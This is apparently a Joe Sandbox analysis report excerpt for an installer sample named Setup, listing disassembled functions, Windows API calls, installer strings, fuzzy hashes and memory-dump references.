Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00018400,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNEL32(005BA348), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

@rD, xrefs: 00404934
, xrefs: 004048DA

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

